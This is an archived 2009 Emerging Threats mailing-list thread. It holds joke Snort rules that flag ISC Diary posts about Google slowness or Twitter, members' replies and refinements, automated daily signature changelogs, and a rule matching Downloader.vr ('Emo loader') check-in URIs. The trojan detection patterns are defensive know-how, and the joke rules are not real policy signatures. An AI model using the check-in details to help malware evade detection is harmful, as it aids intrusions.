From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 15 May 2009 11:03:38 -0400
Subject: [Emerging-Sigs] Second Try; For review; ISC/Twitter/Google ET Sigs
In-Reply-To:
References:
Message-ID: <4A0D844A.70907@jonkmans.com>

Can you share more detail? :)

Kidding. Maybe you're just building suspense?

Matt

John Jacobs wrote:
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From flamdugen at hotmail.com Fri May 15 11:06:16 2009
From: flamdugen at hotmail.com (John Jacobs)
Date: Fri, 15 May 2009 10:06:16 -0500
Subject: [Emerging-Sigs] Second Try; For review; ISC/Twitter/Google ET Sigs
In-Reply-To: <4A0D844A.70907@jonkmans.com>
References: <4A0D844A.70907@jonkmans.com>
Message-ID:

Well that's annoying. Hopefully this works:

Hello ET, first and foremost thank you for the strong effort and excellent signatures. As such, in an attempt to give back to a wonderful community, I humbly submit the following Snort rules for inclusion into the ET signatures. A brief explanation is provided below:

The first signature is designed to detect Google non-security related announcement articles on the ISC Diary; this seems to be a topic of extreme interest for some ISC Handlers despite having little to no security value. I am unsure if this is a result of "Slow News Day" syndrome or another behavioral oddity which manifests at ISC. This will detect on "Google is slow" style articles as well; however, I am sure this signature will require more tweaking as ISC encourages handing over more personal data to a 3rd party under the guise of functionality.

The second signature is designed to detect Joel peddling Twitter on the isc.sans.org Diary, as again, this isn't security related.
I suspect the Twitter signature may tend to fire more than the Google as Joel tends to get excited about "Tweeting" and "Twittering" and this spills over into the ISC Diary anytime he's the "Handler on Duty".

As always, please feel free to make changes to these signatures, especially regarding performance. I've placed these into ET POLICY but they may be more applicable in another class, perhaps a blocking class. I thank you in advance, feel free to modify for PCRE as well.

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert; flow:established,to_server; content:"|0D 0A|Host|3A 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/; classtype:policy-violation; sid:2009xxxx; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans; flow:established,from_server; content:"google"; nocase; content:"slow"; nocase; reference:url,isc.sans.org/diary.html?storyid=6388; reference:url,isc.sans.org/diary.html?storyid=5443; classtype:policy-annoyance; sid:2009xxxx; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans; flow:established,from_server; content:"Joel|20|Esler"; nocase; content:"Twitter"; nocase; reference:url,isc.sans.org/diary.html?storyid=6391; reference:url,isc.sans.org/diary.html?storyid=6388; classtype:policy-annoyance; sid:2009xxxx; rev:1;)

- John Jacobs

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090515/ddf462c7/attachment.html

From jonkman at jonkmans.com Fri May 15 11:19:10 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 15 May 2009 11:19:10 -0400
Subject: [Emerging-Sigs] Second Try; For review; ISC/Twitter/Google ET Sigs
In-Reply-To:
References: <4A0D844A.70907@jonkmans.com>
Message-ID: <4A0D87EE.7090104@jonkmans.com>

Hahaha!! Joel does have a twitter addiction doesn't he?

I think we'll just have to leave these sigs out there for personal use if you see fit.

Quite funny though! Thanks for the chuckle

Matt

John Jacobs wrote:
> Well that's annoying. Hopefully this works:
>
> Hello ET, first and foremost thank you for the strong effort and
> excellent signatures. As such, in an attempt to give back to a
> wonderful community, I humbly submit the following Snort rules for
> inclusion into the ET signatures. A brief explanation is provided below:
>
> The first signature is designed to detect Google non-security related
> announcement articles on the ISC Diary; this seems to be a topic of
> extreme interest for some ISC Handlers despite having little to no
> security value. I am unsure if this is a result of "Slow News Day"
> syndrome or another behavioral oddity which manifests at ISC. This will
> detect on "Google is slow" style articles as well, however, I am sure
> this signature will require more tweaking as ISC encourages handing over
> more personal data to a 3rd party under the guise of functionality.
>
> The second signature is designed to detect Joel peddling Twitter on the
> isc.sans.org Diary, as again, this isn't security related. I suspect
> the Twitter signature may tend to fire more than the Google as Joel
> tends to get excited about "Tweeting" and "Twittering" and this spills
> over into the ISC Diary anytime he's the "Handler on Duty".
>
> As always, please feel free to make changes to these signatures,
> especially regarding performance.
> I've placed these into ET POLICY but
> they may be more applicable in another class, perhaps a blocking
> class. I thank you in advance, feel free to modify for PCRE as well.
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
> isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert;
> flow:established,to_server; content:"|0D 0A|Host|3A
> 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/;
> classtype:policy-violation; sid:2009xxxx; rev:1;)
>
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
> isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans;
> flow:established,from_server; content:"google"; nocase; content:"slow";
> nocase; reference:url,isc.sans.org/diary.html?storyid=6388;
> reference:url,isc.sans.org/diary.html?storyid=5443;
> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
> isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans;
> flow:established,from_server; content:"Joel|20|Esler"; nocase;
> content:"Twitter"; nocase;
> reference:url,isc.sans.org/diary.html?storyid=6391;
> reference:url,isc.sans.org/diary.html?storyid=6388;
> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>
> - John Jacobs
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From eslerj at gmail.com Fri May 15 11:36:58 2009
From: eslerj at gmail.com (Joel Esler)
Date: Fri, 15 May 2009 11:36:58 -0400
Subject: [Emerging-Sigs] Second Try; For review; ISC/Twitter/Google ET Sigs
In-Reply-To: <4A0D87EE.7090104@jonkmans.com>
References: <4A0D844A.70907@jonkmans.com> <4A0D87EE.7090104@jonkmans.com>
Message-ID: <314cf0830905150836r452cfa0fj69cf1cb9d4a8a2c3@mail.gmail.com>

Twitter simply is a fast way of getting immediate feedback from readers/users. Yesterday it came in particularly handy as many couldn't get to their email to see what was going on on lists like the Nanog and Outages. Our primary means of realtime communications remains IRC; however, a large portion of the readers of the ISC can't get to IRC from work.

While funny, you make an interesting point, and I realize this may be quite annoying to some readers, and I'll tone it down.

As far as covering stuff that is "non security related" like Google being down -- well, when 5% of the internet that people use every day, all day, that becomes of interest to our users. The Internet Storm Center is mostly security related, I agree; however, it covers the Internet as a whole. Something as big as Google going down cannot be ignored.

On the plus side, your signatures are extremely well written, follow proper format, would execute fast, and have flowbits in the correct spots. The only suggestion I could make is perhaps instead of an "alert" rule, you may want to change these to drop, as you probably wouldn't want to be alerted to Twitter drivel, and instead flush these packets to /dev/null.

-- 
J

On Fri, May 15, 2009 at 11:19 AM, Matt Jonkman wrote:
> Hahaha!! Joel does have a twitter addiction doesn't he?
>
> I think we'll just have to leave these sigs out there for personal use
> if you see fit.
>
> Quite funny though! Thanks for the chuckle
>
> Matt
>
> John Jacobs wrote:
>> Well that's annoying. Hopefully this works:
>>
>> Hello ET, first and foremost thank you for the strong effort and
>> excellent signatures. As such, in an attempt to give back to a
>> wonderful community, I humbly submit the following Snort rules for
>> inclusion into the ET signatures.
>> A brief explanation is provided below:
>>
>> The first signature is designed to detect Google non-security related
>> announcement articles on the ISC Diary; this seems to be a topic of
>> extreme interest for some ISC Handlers despite having little to no
>> security value. I am unsure if this is a result of "Slow News Day"
>> syndrome or another behavioral oddity which manifests at ISC. This will
>> detect on "Google is slow" style articles as well, however, I am sure
>> this signature will require more tweaking as ISC encourages handing over
>> more personal data to a 3rd party under the guise of functionality.
>>
>> The second signature is designed to detect Joel peddling Twitter on the
>> isc.sans.org Diary, as again, this isn't security related. I suspect
>> the Twitter signature may tend to fire more than the Google as Joel
>> tends to get excited about "Tweeting" and "Twittering" and this spills
>> over into the ISC Diary anytime he's the "Handler on Duty".
>>
>> As always, please feel free to make changes to these signatures,
>> especially regarding performance. I've placed these into ET POLICY but
>> they may be more applicable in another class, perhaps a blocking
>> class. I thank you in advance, feel free to modify for PCRE as well.
>>
>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
>> isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert;
>> flow:established,to_server; content:"|0D 0A|Host|3A
>> 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/;
>> classtype:policy-violation; sid:2009xxxx; rev:1;)
>>
>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>> isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans;
>> flow:established,from_server; content:"google"; nocase; content:"slow";
>> nocase; reference:url,isc.sans.org/diary.html?storyid=6388;
>> reference:url,isc.sans.org/diary.html?storyid=5443;
>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>
>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>> isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans;
>> flow:established,from_server; content:"Joel|20|Esler"; nocase;
>> content:"Twitter"; nocase;
>> reference:url,isc.sans.org/diary.html?storyid=6391;
>> reference:url,isc.sans.org/diary.html?storyid=6388;
>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>
>> - John Jacobs
>>
>>
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> -- 
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

From eslerj at gmail.com Fri May 15 11:47:06 2009
From: eslerj at gmail.com (Joel Esler)
Date: Fri, 15 May 2009 11:47:06 -0400
Subject:
[Emerging-Sigs] Second Try; For review; ISC/Twitter/Google ET Sigs
In-Reply-To: <314cf0830905150836r452cfa0fj69cf1cb9d4a8a2c3@mail.gmail.com>
References: <4A0D844A.70907@jonkmans.com> <4A0D87EE.7090104@jonkmans.com> <314cf0830905150836r452cfa0fj69cf1cb9d4a8a2c3@mail.gmail.com>
Message-ID: <314cf0830905150847o16ae4ce0w5fc51424722df580@mail.gmail.com>

Sorry, just one more thing. I would probably not recommend running these signatures as they may cause a denial of service whenever I am on duty.

Just a thought.

J

On Fri, May 15, 2009 at 11:36 AM, Joel Esler wrote:
> Twitter simply is a fast way of getting immediate feedback from
> readers/users. Yesterday it came in particularly handy as many
> couldn't get to their email to see what was going on on lists like the
> Nanog and Outages. Our primary means of realtime communications
> remains IRC; however, a large portion of the readers of the ISC
> can't get to IRC from work.
>
> While funny, you make an interesting point, and I realize this may be
> quite annoying to some readers, and I'll tone it down.
>
> As far as covering stuff that is "non security related" like Google
> being down -- well, when 5% of the internet that people use every day,
> all day, that becomes of interest to our users. The Internet Storm
> Center is mostly security related, I agree; however, it covers the
> Internet as a whole. Something as big as Google going down cannot be
> ignored.
>
> On the plus side, your signatures are extremely well written, follow
> proper format, would execute fast, and have flowbits in the correct
> spots. The only suggestion I could make is perhaps instead of an
> "alert" rule, you may want to change these to drop, as you probably
> wouldn't want to be alerted to Twitter drivel, and instead flush these
> packets to /dev/null.
>
> -- 
> J
>
> On Fri, May 15, 2009 at 11:19 AM, Matt Jonkman wrote:
>> Hahaha!! Joel does have a twitter addiction doesn't he?
>>
>> I think we'll just have to leave these sigs out there for personal use
>> if you see fit.
>>
>> Quite funny though! Thanks for the chuckle
>>
>> Matt
>>
>> John Jacobs wrote:
>>> Well that's annoying. Hopefully this works:
>>>
>>> Hello ET, first and foremost thank you for the strong effort and
>>> excellent signatures. As such, in an attempt to give back to a
>>> wonderful community, I humbly submit the following Snort rules for
>>> inclusion into the ET signatures. A brief explanation is provided below:
>>>
>>> The first signature is designed to detect Google non-security related
>>> announcement articles on the ISC Diary; this seems to be a topic of
>>> extreme interest for some ISC Handlers despite having little to no
>>> security value. I am unsure if this is a result of "Slow News Day"
>>> syndrome or another behavioral oddity which manifests at ISC. This will
>>> detect on "Google is slow" style articles as well, however, I am sure
>>> this signature will require more tweaking as ISC encourages handing over
>>> more personal data to a 3rd party under the guise of functionality.
>>>
>>> The second signature is designed to detect Joel peddling Twitter on the
>>> isc.sans.org Diary, as again, this isn't security related. I suspect
>>> the Twitter signature may tend to fire more than the Google as Joel
>>> tends to get excited about "Tweeting" and "Twittering" and this spills
>>> over into the ISC Diary anytime he's the "Handler on Duty".
>>>
>>> As always, please feel free to make changes to these signatures,
>>> especially regarding performance. I've placed these into ET POLICY but
>>> they may be more applicable in another class, perhaps a blocking
>>> class. I thank you in advance, feel free to modify for PCRE as well.
>>>
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
>>> isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert;
>>> flow:established,to_server; content:"|0D 0A|Host|3A
>>> 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/;
>>> classtype:policy-violation; sid:2009xxxx; rev:1;)
>>>
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>>> isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans;
>>> flow:established,from_server; content:"google"; nocase; content:"slow";
>>> nocase; reference:url,isc.sans.org/diary.html?storyid=6388;
>>> reference:url,isc.sans.org/diary.html?storyid=5443;
>>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>>
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>>> isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans;
>>> flow:established,from_server; content:"Joel|20|Esler"; nocase;
>>> content:"Twitter"; nocase;
>>> reference:url,isc.sans.org/diary.html?storyid=6391;
>>> reference:url,isc.sans.org/diary.html?storyid=6388;
>>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>>
>>> - John Jacobs
>>>
>>>
>>> ------------------------------------------------------------------------
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>> -- 
>> --------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> --------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>

-- 
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974 |
http://twitter.com/joelesler

From steve.mcluuf at gmail.com Fri May 15 13:02:23 2009
From: steve.mcluuf at gmail.com (Steve McLuuf)
Date: Fri, 15 May 2009 12:02:23 -0500
Subject: [Emerging-Sigs] Second Try; For review; ISC/Twitter/Google ET Sigs
Message-ID: <5c7e31c0905151002t61955ebcu1ce0f9fa1549bea1@mail.gmail.com>

Excellent idea and corresponding sigs. One thing that troubles me is that these can be evaded by not including a Host header, which will prevent the flowbit from being set. So these won't trip for HTTP 1.0 clients. I say we keep these sigs but add HTTP 1.0 compatible ones as well. The idea is to identify the data as the ISC diary by looking for certain static content. Maybe we can get the handlers to add a unique but static character string or something to the diary page(s) so we will not have false positives. For now, I'm just making assumptions as to what is static on the ISC diary page(s). The static content I'm matching on is only on the diary "main" page, not necessarily an individual diary entry page.
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY isc.sans.org Joel Esler Peddling Twitter"; flow:established,from_server; content:"|3C|title|3E|SANS Internet Storm Center|3B| Cooperative Network Security Community |2D| Internet Security |2D| isc |3C 2F|title|3E|"; nocase; content:"diary"; nocase; content:"Joel|20|Esler"; nocase; content:"Twitter"; nocase; reference:url,isc.sans.org/diary.html?storyid=6391; reference:url,isc.sans.org/diary.html?storyid=6388; classtype:policy-annoyance; sid:2009xxxx; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY isc.sans.org SANdlers say Google is slow"; flow:established,from_server; content:"|3C|title|3E|SANS Internet Storm Center|3B| Cooperative Network Security Community |2D| Internet Security |2D| isc |3C 2F|title|3E|"; nocase; content:"diary"; nocase; content:"google"; nocase; content:"slow"; nocase; reference:url,isc.sans.org/diary.html?storyid=6388; reference:url,isc.sans.org/diary.html?storyid=5443; classtype:policy-annoyance; sid:2009xxxx; rev:1;)

Finally, I found the reference to "SANdlers" funny. Do people really use that term?

-Steve

On Fri, May 15, 2009 at 11:36 AM, Joel Esler wrote:
> Twitter simply is a fast way of getting immediate feedback from
> readers/users. Yesterday it came in particularly handy as many
> couldn't get to their email to see what was going on on lists like the
> Nanog and Outages. Our primary means of realtime communications
> remains IRC; however, a large portion of the readers of the ISC
> can't get to IRC from work.
>
> While funny, you make an interesting point, and I realize this may be
> quite annoying to some readers, and I'll tone it down.
>
> As far as covering stuff that is "non security related" like Google
> being down -- well, when 5% of the internet that people use every day,
> all day, that becomes of interest to our users.
> The Internet Storm
> Center is mostly security related, I agree; however, it covers the
> Internet as a whole. Something as big as Google going down cannot be
> ignored.
>
> On the plus side, your signatures are extremely well written, follow
> proper format, would execute fast, and have flowbits in the correct
> spots. The only suggestion I could make is perhaps instead of an
> "alert" rule, you may want to change these to drop, as you probably
> wouldn't want to be alerted to Twitter drivel, and instead flush these
> packets to /dev/null.
>
> -- 
> J
>
> On Fri, May 15, 2009 at 11:19 AM, Matt Jonkman wrote:
>> Hahaha!! Joel does have a twitter addiction doesn't he?
>>
>> I think we'll just have to leave these sigs out there for personal use
>> if you see fit.
>>
>> Quite funny though! Thanks for the chuckle
>>
>> Matt
>>
>> John Jacobs wrote:
>>> Well that's annoying. Hopefully this works:
>>>
>>> Hello ET, first and foremost thank you for the strong effort and
>>> excellent signatures. As such, in an attempt to give back to a
>>> wonderful community, I humbly submit the following Snort rules for
>>> inclusion into the ET signatures. A brief explanation is provided below:
>>>
>>> The first signature is designed to detect Google non-security related
>>> announcement articles on the ISC Diary; this seems to be a topic of
>>> extreme interest for some ISC Handlers despite having little to no
>>> security value. I am unsure if this is a result of "Slow News Day"
>>> syndrome or another behavioral oddity which manifests at ISC. This will
>>> detect on "Google is slow" style articles as well, however, I am sure
>>> this signature will require more tweaking as ISC encourages handing over
>>> more personal data to a 3rd party under the guise of functionality.
>>>
>>> The second signature is designed to detect Joel peddling Twitter on the
>>> isc.sans.org Diary, as again, this isn't security related.
>>> I suspect
>>> the Twitter signature may tend to fire more than the Google as Joel
>>> tends to get excited about "Tweeting" and "Twittering" and this spills
>>> over into the ISC Diary anytime he's the "Handler on Duty".
>>>
>>> As always, please feel free to make changes to these signatures,
>>> especially regarding performance. I've placed these into ET POLICY but
>>> they may be more applicable in another class, perhaps a blocking
>>> class. I thank you in advance, feel free to modify for PCRE as well.
>>>
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
>>> isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert;
>>> flow:established,to_server; content:"|0D 0A|Host|3A
>>> 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/;
>>> classtype:policy-violation; sid:2009xxxx; rev:1;)
>>>
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>>> isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans;
>>> flow:established,from_server; content:"google"; nocase; content:"slow";
>>> nocase; reference:url,isc.sans.org/diary.html?storyid=6388;
>>> reference:url,isc.sans.org/diary.html?storyid=5443;
>>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>>
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>>> isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans;
>>> flow:established,from_server; content:"Joel|20|Esler"; nocase;
>>> content:"Twitter"; nocase;
>>> reference:url,isc.sans.org/diary.html?storyid=6391;
>>> reference:url,isc.sans.org/diary.html?storyid=6388;
>>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>>
>>> - John Jacobs
>>>
>>>
>>> ------------------------------------------------------------------------
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>> --
-------------------------------------------- >> Matthew Jonkman >> Emerging Threats >> Phone 765-429-0398 >> Fax 312-264-0205 >> http://www.emergingthreats.net >> -------------------------------------------- >> >> PGP: http://www.jonkmans.com/mattjonkman.asc >> >> >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090515/5d2e9289/attachment.html From emerging at emergingthreats.net Fri May 15 16:00:10 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Fri, 15 May 2009 16:00:10 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090515200010.932374504B@goliath.jonkmans.com> [***] Results from Oinkmaster started Fri May 15 16:00:10 2009 [***] [///] Modified active rules: [///] 2009349 - ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity (emerging-virus.rules) [---] Disabled rules: [---] 2009130 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Request (emerging-virus.rules) 2009131 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Response (emerging-virus.rules) [---] Removed rules: [---] 2003642 - ET TROJAN Downloader.Affill User Agent Detected (lol) (emerging-virus.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (29): 2009349 || ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349 2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 
Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510142 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510143 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510144 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510145 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510146 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510147 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510148 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510149 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510150 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510151 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510152 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-virus.rules (1): #disabling for now. 
this same payload seems to be used by a number of ping libraries [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (2): 2003642 || ET TROJAN Downloader.Affill User Agent Detected (lol) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2003642 2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349 -> Removed from emerging-sid-msg.map.txt (2): 2003642 || ET TROJAN Downloader.Affill User Agent Detected (lol) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2003642 2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349 From phatbuckett at gmail.com Fri May 15 21:15:26 2009 From: phatbuckett at gmail.com (Darren Spruell) Date: Fri, 15 May 2009 18:15:26 -0700 Subject: [Emerging-Sigs] 2008546 = emo loader Message-ID: <839aec700905151815v243086c4oc2ec520cac48b360@mail.gmail.com> Existing rule: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader.vr Checkin part 1 of 2"; flow:established,to_server; content:"GET "; depth:4; uricontent:".php"; uricontent:"v="; uricontent:"&rs="; uricontent:"&n="; uricontent:"&uid="; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008546; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General; sid:2008546; rev:3;) This is commonly known as Emo loader (e.g. http://www.malwaredomainlist.com/mdl.php?search=emo+&colsearch=All&quantity=50), if a rule message update is OK. Also, by the message text, is there supposed to be an accompanying part 2 of 2 anywhere? 
--
Darren Spruell
phatbuckett at gmail.com

From emerging at emergingthreats.net Sat May 16 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 16 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090516200011.557134504B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat May 16 16:00:11 2009 [***]

[///] Modified active rules: [///]

2009351 - ET TROJAN Urlzone/Bebloh Communication with Controller (emerging-virus.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (1):

2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bebloh || url,doc.emergingthreats.net/2009351 || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td

-> Added to emerging-sid-msg.map.txt (1):

2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bebloh || url,doc.emergingthreats.net/2009351 || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (145):
